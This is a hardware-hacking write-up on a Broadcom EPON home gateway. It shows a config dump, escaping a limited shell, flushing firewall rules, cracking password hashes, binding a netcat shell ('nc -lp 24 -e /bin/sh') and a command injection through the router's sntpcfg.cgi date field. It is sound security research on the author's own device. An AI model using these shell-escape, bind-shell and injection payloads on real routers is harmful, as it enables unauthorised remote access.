<X_CT-COM_Computer-MinAddress>192.168.1.2</X_CT-COM_Computer-MinAddress>
<X_CT-COM_Computer-MaxAddress>192.168.1.100</X_CT-COM_Computer-MaxAddress>
<IPInterface instance="1">
<Enable>TRUE</Enable>
<X_BROADCOM_COM_IfName>br0</X_BROADCOM_COM_IfName>
</IPInterface>
<IPInterface nextInstance="2" ></IPInterface>
</LANHostConfigManagement>
<X_BROADCOM_COM_IPv6LANHostConfigManagement>
<IPv6PDWANConnection></IPv6PDWANConnection>
<IPv6InterfaceNumberOfEntries>0</IPv6InterfaceNumberOfEntries>
</X_BROADCOM_COM_IPv6LANHostConfigManagement>
<LANEthernetInterfaceConfig instance="1">
<Enable>TRUE</Enable>
<X_BROADCOM_COM_IfName>eth0</X_BROADCOM_COM_IfName>
</LANEthernetInterfaceConfig>
<LANEthernetInterfaceConfig instance="2">
<Enable>TRUE</Enable>
<X_BROADCOM_COM_IfName>eth1</X_BROADCOM_COM_IfName>
</LANEthernetInterfaceConfig>
<LANEthernetInterfaceConfig instance="3">
<Enable>TRUE</Enable>
<X_BROADCOM_COM_IfName>eth2</X_BROADCOM_COM_IfName>
</LANEthernetInterfaceConfig>
<LANEthernetInterfaceConfig instance="4">
<Enable>TRUE</Enable>
<X_BROADCOM_COM_IfName>eth3</X_BROADCOM_COM_IfName>
</LANEthernetInterfaceConfig>
<LANEthernetInterfaceConfig nextInstance="5" ></LANEthernetInterfaceConfig>
</LANDevice>
<LANDevice nextInstance="2" ></LANDevice>
<WANDevice instance="1">
<WANConnectionNumberOfEntries>3</WANConnectionNumberOfEntries>
<WANCommonInterfaceConfig>
<WANAccessType>Ethernet</WANAccessType>
</WANCommonInterfaceConfig>
<WANEthernetInterfaceConfig>
<Enable>TRUE</Enable>
<MaxBitRate>Auto</MaxBitRate>
<DuplexMode>Auto</DuplexMode>
<X_BROADCOM_COM_IfName>eth4</X_BROADCOM_COM_IfName>
<X_BROADCOM_COM_ConnectionMode>MultipleServiceMode</X_BROADCOM_COM_ConnectionMode>
</WANEthernetInterfaceConfig>
<WANConnectionDevice instance="1">
<WANIPConnectionNumberOfEntries>0</WANIPConnectionNumberOfEntries>
<WANPPPConnectionNumberOfEntries>1</WANPPPConnectionNumberOfEntries>
<X_CT-COM_WANEponLinkConfig>
<Mode>2</Mode>
<VLANIDMark>85</VLANIDMark>
</X_CT-COM_WANEponLinkConfig>
<WANPPPConnection instance="1">
<Enable>TRUE</Enable>
<ConnectionType>PPPoE_Bridged</ConnectionType>
<Name>2_Other_B_VID_85</Name>
<X_BROADCOM_COM_ConnectionId>2</X_BROADCOM_COM_ConnectionId>
<X_BROADCOM_COM_IfName>eth4_2.85</X_BROADCOM_COM_IfName>
<X_BROADCOM_COM_VlanMux8021p>0</X_BROADCOM_COM_VlanMux8021p>
<X_BROADCOM_COM_VlanMuxID>85</X_BROADCOM_COM_VlanMuxID>
<PortMappingNumberOfEntries>0</PortMappingNumberOfEntries>
<X_BROADCOM_COM_DefaultIPv6Gateway></X_BROADCOM_COM_DefaultIPv6Gateway>
<X_CT-COM_LanInterface>InternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.2</X_CT-COM_LanInterface>
<X_CT-COM_LanInterface-DHCPEnable>FALSE</X_CT-COM_LanInterface-DHCPEnable>
<X_CT-COM_MulticastVlan>51</X_CT-COM_MulticastVlan>
<X_CT-COM_ServiceList>OTHER</X_CT-COM_ServiceList>
</WANPPPConnection>
</WANConnectionDevice>
<WANConnectionDevice instance="2">
<WANIPConnectionNumberOfEntries>1</WANIPConnectionNumberOfEntries>
<WANPPPConnectionNumberOfEntries>0</WANPPPConnectionNumberOfEntries>
<X_CT-COM_WANEponLinkConfig>
<Mode>2</Mode>
<VLANIDMark>46</VLANIDMark>
</X_CT-COM_WANEponLinkConfig>
<WANIPConnection instance="1">
<Enable>TRUE</Enable>
<ConnectionType>IP_Routed</ConnectionType>
<Name>1_TR069_VOIP_R_VID_46</Name>
<X_BROADCOM_COM_FirewallEnabled>TRUE</X_BROADCOM_COM_FirewallEnabled>
<X_BROADCOM_COM_IGMPEnabled>TRUE</X_BROADCOM_COM_IGMPEnabled>
<DNSServers></DNSServers>
<X_BROADCOM_COM_IfName>eth4_1.46</X_BROADCOM_COM_IfName>
<X_BROADCOM_COM_ConnectionId>1</X_BROADCOM_COM_ConnectionId>
<X_BROADCOM_COM_VlanMux8021p>0</X_BROADCOM_COM_VlanMux8021p>
<X_BROADCOM_COM_VlanMuxID>46</X_BROADCOM_COM_VlanMuxID>
<PortMappingNumberOfEntries>0</PortMappingNumberOfEntries>
<X_CT-COM_ServiceList>TR069,VOIP</X_CT-COM_ServiceList>
<X_CT-COM_DHCPOPTION60 instance="1">
</X_CT-COM_DHCPOPTION60>
<X_CT-COM_DHCPOPTION60 instance="2">
</X_CT-COM_DHCPOPTION60>
<X_CT-COM_DHCPOPTION60 instance="3">
</X_CT-COM_DHCPOPTION60>
<X_CT-COM_DHCPOPTION60 instance="4">
</X_CT-COM_DHCPOPTION60>
<X_CT-COM_DHCPOPTION60 nextInstance="5" ></X_CT-COM_DHCPOPTION60>
<X_CT-COM_DHCPOPTION125 instance="1">
</X_CT-COM_DHCPOPTION125>
<X_CT-COM_DHCPOPTION125 nextInstance="2" ></X_CT-COM_DHCPOPTION125>
</WANIPConnection>
</WANConnectionDevice>
<WANConnectionDevice instance="3">
<WANIPConnectionNumberOfEntries>0</WANIPConnectionNumberOfEntries>
<WANPPPConnectionNumberOfEntries>1</WANPPPConnectionNumberOfEntries>
<WANDSLLinkConfig>
<X_BROADCOM_COM_ConnectionMode>MultipleServiceMode</X_BROADCOM_COM_ConnectionMode>
</WANDSLLinkConfig>
<WANPPPConnection instance="1">
<Enable>TRUE</Enable>
<ConnectionType>IP_Routed</ConnectionType>
<Name>3_INTERNET_R</Name>
<NATEnabled>TRUE</NATEnabled>
<X_BROADCOM_COM_FirewallEnabled>TRUE</X_BROADCOM_COM_FirewallEnabled>
<X_BROADCOM_COM_IGMPEnabled>TRUE</X_BROADCOM_COM_IGMPEnabled>
<Username>BBBBBBBBBB</Username>
<Password>CCCCCCCCCCCC</Password>
<X_BROADCOM_COM_ConnectionId>3</X_BROADCOM_COM_ConnectionId>
<X_BROADCOM_COM_IfName>ppp0_3</X_BROADCOM_COM_IfName>
<X_BROADCOM_COM_BcastAddr>255.255.255.255</X_BROADCOM_COM_BcastAddr>
<ExternalIPAddress>AAA.AA.AAA.AAA</ExternalIPAddress>
<DNSServers>180.168.255.118,116.228.111.18</DNSServers>
<PortMappingNumberOfEntries>0</PortMappingNumberOfEntries>
<X_BROADCOM_COM_DefaultIPv6Gateway></X_BROADCOM_COM_DefaultIPv6Gateway>
</WANPPPConnection>
</WANConnectionDevice>
</WANDevice>
<WANDevice nextInstance="2" ></WANDevice>
<Layer3Forwarding>
<ForwardNumberOfEntries>0</ForwardNumberOfEntries>
</Layer3Forwarding>
<X_BROADCOM_COM_IPv6Layer3Forwarding>
<ForwardNumberOfEntries>0</ForwardNumberOfEntries>
</X_BROADCOM_COM_IPv6Layer3Forwarding>
<Services>
<StorageService instance="1">
</StorageService>
<StorageService nextInstance="2" ></StorageService>
<VoiceService instance="1">
<VoiceProfileNumberOfEntries>0</VoiceProfileNumberOfEntries>
<X_BROADCOM_COM_BoundIfName>eth4_1.46</X_BROADCOM_COM_BoundIfName>
<Capabilities>
<Codecs instance="1">
</Codecs>
<Codecs instance="2">
</Codecs>
<Codecs instance="3">
</Codecs>
<Codecs instance="4">
</Codecs>
<Codecs instance="5">
</Codecs>
<Codecs instance="6">
</Codecs>
<Codecs instance="7">
</Codecs>
<Codecs instance="8">
</Codecs>
<Codecs instance="9">
</Codecs>
<Codecs instance="10">
</Codecs>
<Codecs instance="11">
</Codecs>
<Codecs instance="12">
</Codecs>
<Codecs instance="13">
</Codecs>
<Codecs instance="14">
</Codecs>
<Codecs instance="15">
</Codecs>
<Codecs instance="16">
</Codecs>
<Codecs nextInstance="17" ></Codecs>
</Capabilities>
<VoiceProfile instance="1">
<X_BROADCOM_COM_VoiceJitterBufferMode>Static</X_BROADCOM_COM_VoiceJitterBufferMode>
<X_BROADCOM_COM_EnLocalFeature>2</X_BROADCOM_COM_EnLocalFeature>
<X_BROADCOM_COM_MinFlashDuration>90</X_BROADCOM_COM_MinFlashDuration>
<X_BROADCOM_COM_MaxFlashDuration>500</X_BROADCOM_COM_MaxFlashDuration>
<DigitMap>11[0249]|120|100xx|20[01]|400xxxxxxx|800xxxxxxx|1[3458]xxxxxxxxx|01[3458]xxxxxxxxx|2[1-9]xxxxxx|3[1-9]xxxxxx|5xxxxxxx|6[1-9]xxxxxx|8[1-9]xxxxxx|955xx|x[*0-9].#|x[*0-9].T|**x.T|##|[*#]x[0-9*].#|*#x[0-9*].#|#*x[0-9*].#</DigitMap>
<DigitMapMatchMode>min</DigitMapMatchMode>
<X_CT-COM_InterDigitTimerLong>20</X_CT-COM_InterDigitTimerLong>
<X_CT-COM_ServerType>1</X_CT-COM_ServerType>
<SIP>
<ProxyServer>(null)</ProxyServer>
<ProxyServerPort>0</ProxyServerPort>
<RegistrarServer>(null)</RegistrarServer>
<RegistrarServerPort>0</RegistrarServerPort>
<OutboundProxy>(null)</OutboundProxy>
<OutboundProxyPort>0</OutboundProxyPort>
<RegisterExpires>3600</RegisterExpires>
<X_CT-COM_Standby-ProxyServer>(null)</X_CT-COM_Standby-ProxyServer>
<X_CT-COM_Standby-ProxyServerPort>0</X_CT-COM_Standby-ProxyServerPort>
<X_CT-COM_Standby-RegistrarServer>(null)</X_CT-COM_Standby-RegistrarServer>
<X_CT-COM_Standby-RegistrarServerPort>0</X_CT-COM_Standby-RegistrarServerPort>
<X_CT-COM_Standby-OutboundProxy>(null)</X_CT-COM_Standby-OutboundProxy>
<X_CT-COM_Standby-OutboundProxyPort>0</X_CT-COM_Standby-OutboundProxyPort>
<X_CT-COM_HeartbeatCycle>180</X_CT-COM_HeartbeatCycle>
</SIP>
<X_CT-COM_G711FAX>
<ControlType>other</ControlType>
</X_CT-COM_G711FAX>
<Line instance="1">
<PhyReferenceList>0</PhyReferenceList>
<SubsReg>TRUE</SubsReg>
<SubsUA>TRUE</SubsUA>
<CallingFeatures>
<X_BROADCOM_COM_ToneDialTime>10000</X_BROADCOM_COM_ToneDialTime>
<X_BROADCOM_COM_ToneRingbackTime>120000</X_BROADCOM_COM_ToneRingbackTime>
</CallingFeatures>
<Codec>
<List instance="1">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>2</Priority>
</List>
<List instance="2">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>3</Priority>
</List>
<List instance="3">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>4</Priority>
</List>
<List instance="4">
<PacketizationPeriod>20</PacketizationPeriod>
</List>
<List instance="5">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="6">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="7">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="8">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="9">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="10">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="11">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="12">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="13">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="14">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="15">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="16">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List nextInstance="17" ></List>
</Codec>
</Line>
<Line instance="2">
<SubsReg>TRUE</SubsReg>
<SubsUA>TRUE</SubsUA>
<Codec>
<List instance="1">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>2</Priority>
</List>
<List instance="2">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>3</Priority>
</List>
<List instance="3">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>4</Priority>
</List>
<List instance="4">
<PacketizationPeriod>20</PacketizationPeriod>
</List>
<List instance="5">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="6">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="7">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="8">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="9">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="10">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="11">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="12">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="13">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="14">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="15">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List instance="16">
<PacketizationPeriod>20</PacketizationPeriod>
<Priority>101</Priority>
</List>
<List nextInstance="17" ></List>
</Codec>
</Line>
<Line nextInstance="3" ></Line>
</VoiceProfile>
<VoiceProfile nextInstance="2" ></VoiceProfile>
<PhyInterface instance="1">
</PhyInterface>
<PhyInterface instance="2">
</PhyInterface>
</VoiceService>
<VoiceService nextInstance="2" ></VoiceService>
<X_CT-COM_MWBAND>
<TotalTerminalNumber>5</TotalTerminalNumber>
</X_CT-COM_MWBAND>
</Services>
<X_CT-COM_UplinkQoS>
<Mode>INTERNET,TR069,VOIP,IPTV</Mode>
<Enable>TRUE</Enable>
<App instance="2">
<ClassQueue>3</ClassQueue>
</App>
<App instance="3">
<AppName>VOIP</AppName>
</App>
<App nextInstance="4" ></App>
<Classification instance="1">
<ClassQueue>2</ClassQueue>
<type instance="1">
<Type>LANInterface</Type>
<Max>InternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.2</Max>
<Min>InternetGatewayDevice.LANDevice.1.LANEthernetInterfaceConfig.2</Min>
<ProtocolList>TCP,UDP</ProtocolList>
</type>
<type nextInstance="2" ></type>
</Classification>
<Classification instance="2">
<type nextInstance="2" ></type>
</Classification>
<Classification instance="3">
<ClassQueue>3</ClassQueue>
</Classification>
<Classification instance="4">
<ClassQueue>4</ClassQueue>
</Classification>
<Classification nextInstance="5" ></Classification>
<PriorityQueue instance="1">
<Enable>TRUE</Enable>
<Priority>1</Priority>
<Weight>40</Weight>
</PriorityQueue>
<PriorityQueue instance="2">
<Enable>TRUE</Enable>
<Priority>2</Priority>
<Weight>30</Weight>
</PriorityQueue>
<PriorityQueue instance="3">
<Enable>TRUE</Enable>
<Priority>3</Priority>
<Weight>20</Weight>
</PriorityQueue>
<PriorityQueue instance="4">
<Enable>TRUE</Enable>
<Priority>4</Priority>
<Weight>10</Weight>
</PriorityQueue>
<PriorityQueue nextInstance="5" ></PriorityQueue>
</X_CT-COM_UplinkQoS>
<X_CT-COM_UserInfo>
<Status>0</Status>
<Result>1</Result>
</X_CT-COM_UserInfo>
<X_BROADCOM_COM_IGMPCfg>
<IgmpQI>300</IgmpQI>
</X_BROADCOM_COM_IGMPCfg>
<X_BROADCOM_COM_Firewall>
<X_BROADCOM_COM_ProtocolSupportedCfg instance="1">
<Type>HTTP</Type>
<Name>tcp</Name>
<Port>80</Port>
<Outgoing>TRUE</Outgoing>
</X_BROADCOM_COM_ProtocolSupportedCfg>
<X_BROADCOM_COM_ProtocolSupportedCfg instance="2">
<Type>DNS</Type>
<Name>udp</Name>
<Port>53</Port>
<Outgoing>TRUE</Outgoing>
</X_BROADCOM_COM_ProtocolSupportedCfg>
<X_BROADCOM_COM_ProtocolSupportedCfg instance="3">
<Type>FTP</Type>
<Name>tcp</Name>
<Port>21</Port>
<Outgoing>TRUE</Outgoing>
</X_BROADCOM_COM_ProtocolSupportedCfg>
<X_BROADCOM_COM_ProtocolSupportedCfg instance="4">
<Type>TELNET</Type>
<Name>tcp</Name>
<Port>23</Port>
<Outgoing>TRUE</Outgoing>
</X_BROADCOM_COM_ProtocolSupportedCfg>
<X_BROADCOM_COM_ProtocolSupportedCfg instance="5">
<Type>SMTP</Type>
<Name>tcp</Name>
<Port>25</Port>
<Outgoing>TRUE</Outgoing>
</X_BROADCOM_COM_ProtocolSupportedCfg>
<X_BROADCOM_COM_ProtocolSupportedCfg instance="6">
<Type>POP3</Type>
<Name>tcp</Name>
<Port>110</Port>
<Outgoing>TRUE</Outgoing>
</X_BROADCOM_COM_ProtocolSupportedCfg>
<X_BROADCOM_COM_ProtocolSupportedCfg instance="7">
<Type>NNTP</Type>
<Name>tcp</Name>
<Port>119</Port>
<Outgoing>TRUE</Outgoing>
</X_BROADCOM_COM_ProtocolSupportedCfg>
<X_BROADCOM_COM_ProtocolSupportedCfg instance="8">
<Type>ICMP</Type>
<Name>icmp</Name>
<Outgoing>TRUE</Outgoing>
</X_BROADCOM_COM_ProtocolSupportedCfg>
<X_BROADCOM_COM_ProtocolSupportedCfg instance="9">
<Type>H323</Type>
<Name>tcp</Name>
<Port>1720</Port>
<Outgoing>TRUE</Outgoing>
</X_BROADCOM_COM_ProtocolSupportedCfg>
<X_BROADCOM_COM_ProtocolSupportedCfg instance="10">
<Type>T.120</Type>
<Name>tcp</Name>
<Port>1503</Port>
<Outgoing>TRUE</Outgoing>
</X_BROADCOM_COM_ProtocolSupportedCfg>
<X_BROADCOM_COM_ProtocolSupportedCfg instance="11">
<Type>SSH</Type>
<Name>tcp</Name>
<Port>22</Port>
<Outgoing>TRUE</Outgoing>
</X_BROADCOM_COM_ProtocolSupportedCfg>
<X_BROADCOM_COM_ProtocolSupportedCfg instance="12">
<Type>SNTP</Type>
<Name>udp</Name>
<Port>123</Port>
<Outgoing>TRUE</Outgoing>
</X_BROADCOM_COM_ProtocolSupportedCfg>
<X_BROADCOM_COM_ProtocolSupportedCfg instance="13">
<Type>RADIUS</Type>
<Name>tcp</Name>
<Port>1812</Port>
<Outgoing>TRUE</Outgoing>
</X_BROADCOM_COM_ProtocolSupportedCfg>
<X_BROADCOM_COM_ProtocolSupportedCfg instance="14">
<Type>SIP</Type>
<Name>udp</Name>
<Port>5060</Port>
<Outgoing>TRUE</Outgoing>
</X_BROADCOM_COM_ProtocolSupportedCfg>
<X_BROADCOM_COM_ProtocolSupportedCfg instance="15">
<Type>SNMP</Type>
<Name>udp</Name>
<Port>161</Port>
<Outgoing>TRUE</Outgoing>
</X_BROADCOM_COM_ProtocolSupportedCfg>
<X_BROADCOM_COM_ProtocolSupportedCfg instance="16">
<Type>RTSP</Type>
<Name>udp</Name>
<Port>554</Port>
<Outgoing>TRUE</Outgoing>
</X_BROADCOM_COM_ProtocolSupportedCfg>
<X_BROADCOM_COM_ProtocolSupportedCfg nextInstance="17" ></X_BROADCOM_COM_ProtocolSupportedCfg>
</X_BROADCOM_COM_Firewall>
<X_BROADCOM_COM_SrvControlCfg instance="1">
<SrvName>HTTP</SrvName>
<Protocol>TCP</Protocol>
<DefaultPort>80</DefaultPort>
<Port>80</Port>
<LanAllow>TRUE</LanAllow>
<WanAllow>TRUE</WanAllow>
</X_BROADCOM_COM_SrvControlCfg>
<X_BROADCOM_COM_SrvControlCfg instance="2">
<SrvName>TELNET</SrvName>
<Protocol>TCP</Protocol>
<DefaultPort>23</DefaultPort>
<Port>23</Port>
</X_BROADCOM_COM_SrvControlCfg>
<X_BROADCOM_COM_SrvControlCfg instance="3">
<SrvName>SSH</SrvName>
<Protocol>TCP</Protocol>
<DefaultPort>22</DefaultPort>
<Port>22</Port>
</X_BROADCOM_COM_SrvControlCfg>
<X_BROADCOM_COM_SrvControlCfg instance="4">
<SrvName>FTP</SrvName>
<Protocol>TCP</Protocol>
<DefaultPort>21</DefaultPort>
<Port>21</Port>
</X_BROADCOM_COM_SrvControlCfg>
<X_BROADCOM_COM_SrvControlCfg instance="5">
<SrvName>TFTP</SrvName>
<Protocol>UDP</Protocol>
<DefaultPort>69</DefaultPort>
<Port>69</Port>
</X_BROADCOM_COM_SrvControlCfg>
<X_BROADCOM_COM_SrvControlCfg instance="6">
<SrvName>ICMP</SrvName>
<Protocol>ICMP</Protocol>
<LanAllow>TRUE</LanAllow>
<WanAllow>TRUE</WanAllow>
</X_BROADCOM_COM_SrvControlCfg>
<X_BROADCOM_COM_SrvControlCfg instance="7">
<SrvName>SNMP</SrvName>
<Protocol>UDP</Protocol>
<DefaultPort>161</DefaultPort>
<Port>161</Port>
</X_BROADCOM_COM_SrvControlCfg>
<X_BROADCOM_COM_SrvControlCfg nextInstance="8" ></X_BROADCOM_COM_SrvControlCfg>
<X_BROADCOM_COM_EponGlobal>
<LlidsNum>1</LlidsNum>
<ResetChip>4294967295</ResetChip>
<DebugEnable>4294967295</DebugEnable>
<XcvrTxPowerEnable>4294967295</XcvrTxPowerEnable>
<PonIssueDetect>4294967295</PonIssueDetect>
<LaserAlwaysOn>4294967295</LaserAlwaysOn>
</X_BROADCOM_COM_EponGlobal>
<X_BROADCOM_COM_EponAlarm>
<AlarmId>4294967295</AlarmId>
<AdminState>4294967295</AdminState>
<Rising>4294967295</Rising>
<Falling>4294967295</Falling>
</X_BROADCOM_COM_EponAlarm>
</InternetGatewayDevice>
</DslCpeConfig>
It turns out that X_BROADCOM_COM_LoginCfg/UserPassword is the same as the UserAdmin password from the sticker/bootloader but encoded in base64. X_BROADCOM_COM_LoginCfg/AdminPassword also looks like it’s base64 encoded.
It does not decode to the value of X_CT-COM_TeleComAccount/Password though which is plaintext already and can be used to log onto the serial commandshell and for accessing the web GUI with username telecomadmin!
Gaining Access
Before looking at the web GUI for telecomadmin I want to escape from this limited shell first and get a proper busybox shell. Seeing some familiar Linux shell commands in the limited shell proved to be a remarkably easy way to get this.
> echo "" && /bin/sh
BusyBox v1.00 (2012.03.16-09:02+0000) Built-in shell (msh)
Enter 'help' for a list of built-in commands.
# pwd
/
# ls
bin etc linuxrc modules sbin tmp var
dev lib mnt proc sys usr webs
# ps
PID Uid VmSize Stat Command
1 admin 396 S init
2 admin SW [softirq-high/0]
3 admin SW [softirq-timer/0]
4 admin SW [softirq-net-tx/]
5 admin SW [softirq-net-rx/]
6 admin SW [softirq-block/0]
7 admin SW [softirq-tasklet]
8 admin SW [softirq-sched/0]
9 admin SW [softirq-rcu/0]
10 admin SW< [events/0]
11 admin SW< [khelper]
12 admin SW< [kthread]
13 admin SW< [kblockd/0]
14 admin SW [pdflush]
15 admin SW [pdflush]
16 admin SWN [kswapd0]
17 admin SW< [aio/0]
18 admin SW [mtdblockd]
27 admin 444 S -sh
61 admin SW [bcmsw]
85 admin 244 S /usr/sbin/lightbox
88 admin 832 S vtp_pc
96 admin 1344 S vtp_logic
97 admin 1344 S vtp_logic
98 admin 1344 S vtp_logic
99 admin 1344 S vtp_logic
101 admin 956 S smd
104 admin 2092 S ssk
111 admin 576 S sntp -s time.windows.com -s time.nist.gov -t Beijing,
112 admin 572 S dhcpd
652 admin 324 S dhcpc -f -i eth4_1.46
663 admin 744 S pppd -c ppp0_3 -i eth4_3 -u BBBBBBBBBB -p ******** -f
681 admin 876 S mcpd
684 admin 1384 S tr69c
685 admin 1316 S ctcp -m 0
686 admin 1860 S vodsl -m 0
687 admin 896 S bcmmserver
688 admin 448 S dsldiagd
696 admin SWN [jffs2_gcd_mtd1]
721 admin 208 S /bin/monapp
723 admin 540 S /bin/loopmon
729 admin 11996 S /usr/sbin/ggsip
814 admin 11996 S /usr/sbin/ggsip
815 admin 11996 S /usr/sbin/ggsip
816 admin 11996 S /usr/sbin/ggsip
818 admin 11996 S /usr/sbin/ggsip
819 admin 11996 S /usr/sbin/ggsip
824 admin 11996 S /usr/sbin/ggsip
827 admin 11996 S /usr/sbin/ggsip
828 admin 11996 S /usr/sbin/ggsip
829 admin 11996 S /usr/sbin/ggsip
832 admin 11996 S /usr/sbin/ggsip
833 admin 11996 S /usr/sbin/ggsip
836 admin 11996 S /usr/sbin/ggsip
837 admin 11996 S /usr/sbin/ggsip
838 admin 11996 S /usr/sbin/ggsip
839 admin 11996 S /usr/sbin/ggsip
852 admin 11996 S /usr/sbin/ggsip
853 admin 11996 S /usr/sbin/ggsip
887 admin 1316 S ctcp -m 0
888 admin 1316 S ctcp -m 0
889 admin 1316 S ctcp -m 0
890 admin 1316 S ctcp -m 0
891 admin 1316 S ctcp -m 0
898 admin 1316 S ctcp -m 0
970 admin 896 S bcmmserver
971 admin 896 S bcmmserver
972 admin 896 S bcmmserver
7671 admin 1492 S httpd
8429 admin 1040 S consoled
8488 admin 384 S sh -c echo "" && /bin/sh
8490 admin 428 S /bin/sh
8829 admin 400 R ps
# cat /etc/inetd.conf
echo stream tcp nowait root internal
echo dgram udp wait root internal
discard stream tcp nowait root internal
discard dgram udp wait root internal
daytime stream tcp nowait root internal
daytime dgram udp wait root internal
chargen stream tcp nowait root internal
chargen dgram udp wait root internal
time stream tcp nowait root internal
time dgram udp wait root internal
ftp stream tcp nowait root /bin/ftpd ftpd
telnet stream tcp nowait root /bin/telnetd telnetd -L /bin/login
After a while we will be dropped back into the limited shell with the following message:
# consoled:error:281.412:prctl_runCommandInShellWithTimeout:185:prctl_collect failed, ret=9809
If inetd should give us telnet or ftp why do all connection attempts time-out?
# iptables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination
APPIN all -- anywhere anywhere
IPFLTIN all -- anywhere anywhere
Chain FORWARD (policy ACCEPT)
target prot opt source destination
VSFWD all -- anywhere anywhere
APPFWD all -- anywhere anywhere
IPFLTINFWD all -- anywhere anywhere
IPFLTOUTFWD all -- anywhere anywhere
FIREWALLFWD all -- anywhere anywhere
DMZFWD all -- anywhere anywhere
Chain OUTPUT (policy ACCEPT)
target prot opt source destination
Chain APPFWD (1 references)
target prot opt source destination
Chain APPIN (1 references)
target prot opt source destination
ACCEPT tcp -- anywhere anywhere tcp dpt:9080
Chain DMZFWD (1 references)
target prot opt source destination
Chain FIREWALLFWD (1 references)
target prot opt source destination
Chain IPFLTIN (1 references)
target prot opt source destination
DROP tcp -- anywhere anywhere tcp dpt:telnet
DROP tcp -- anywhere anywhere tcp dpt:ssh
DROP tcp -- anywhere anywhere tcp dpt:ftp
DROP udp -- anywhere anywhere udp dpt:tftp
DROP udp -- anywhere anywhere udp dpt:snmp
Chain IPFLTINFWD (1 references)
target prot opt source destination
Chain IPFLTOUTFWD (1 references)
target prot opt source destination
Chain VSFWD (1 references)
target prot opt source destination
Looks like the IPFLTIN chain is blocking this. Not a problem that can’t be solved with a flush:
iptables -F IPFLTIN
Telnet now asks for credentials when we connect from a remote machine:
$ telnet 192.168.1.1
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
BCM96328 xDSL Router
Login:
The problem is that the credentials known so far do not work on telnet or FTP. Time to have a look at /etc/passwd
# cat /etc/passwd
admin:XXXXXXXXXXXXX:0:0:Administrator:/:/bin/sh
ftpadmin:YYYYYYYYYYYYY:0:8:ftp account:/mnt:/bin/sh
Feeding this data to john tells me ftpadmin has password ftpadmin, however ftpadmin only gives us access over ftp and not over telnet:
$ ftp
ftp> open 192.168.1.1
Connected to 192.168.1.1 (192.168.1.1).
220 Ftp firmware update utility
Name (192.168.1.1:erik): ftpadmin
331 Password please.
Password:
230 User logged in.
/etc/bftpd.conf tells me the root of the ftp server is /mnt, so getting files off the device can be done by copying them to /mnt first and retrieving over FTP for further analysis. I did some preliminary analysis on the telnetd binary because it’s not a symlink to busybox. And it looks like it’s something proprietary, also the /bin/login mentioned in /etc/inetd.conf does not exist on the read-only filesystem. This is why I did not wait for john to get me the password for admin.
I decided to look around for a busybox binary with more applets since the one in flash is pretty limited, a great place to start is darkergo’s repository where you can find static binaries for MIPS. This version requires devpts for telnetd which is not available in the kernel but nc works to bind a shell just as well ;-)
# cd tmp
# wget http://192.168.1.132:8000/busybox-mips
Connecting to 192.168.1.132[192.168.1.132]:8000
busybox-mips 100% |*****************************| 1654 KB 00:00 ETA
# chmod +x busybox-mips
# ./busybox-mips nc -lp 24 -e /bin/sh
Maintaining Access
Great to leverage a hardware UART to get a remote shell, but we still need physical access to obtain it. Next job is to find a way to do this remote. A logical place to start looking is at the web GUI. When logged on as user useradmin with the known password there are no promising input fields to play with. But still gives an interesting cookie: Name=0useradmin.
Using the telecomadmin user and with the plaintext password gives plenty more options in the web GUI to play with and a cookie Name=0telecomadmin. After poking around I found that the input box to set the date on sntpcfg.html is used together with a shell execute of date to change the system clock. As a bonus httpd prints some debugging to the UART.
curl 'http://192.168.1.1/sntpcfg.cgi?localTime_current=bogustime%26echo%20Hello%20world' -H 'Cookie: Name=0telecomadmin'
Shows the following on the UART:
date: invalid date `bogustime'
Hello world
I discovered that setting the cookie without really logging is not accepted. Running without a cookie returns a login page and running with the useradmin cookie is also rejected:
httpd:error:25.923:handle_request:2071:UserAuthentication failed file=sntpcfg.cgi
So far this means we need to get the telecomadmin credentials, but these credentials are not available to us and look random. Useradmin also has random credentials so even if we could exploit the flaw through useradmin this is still requires access to the device to read the useradmin password from the sticker.
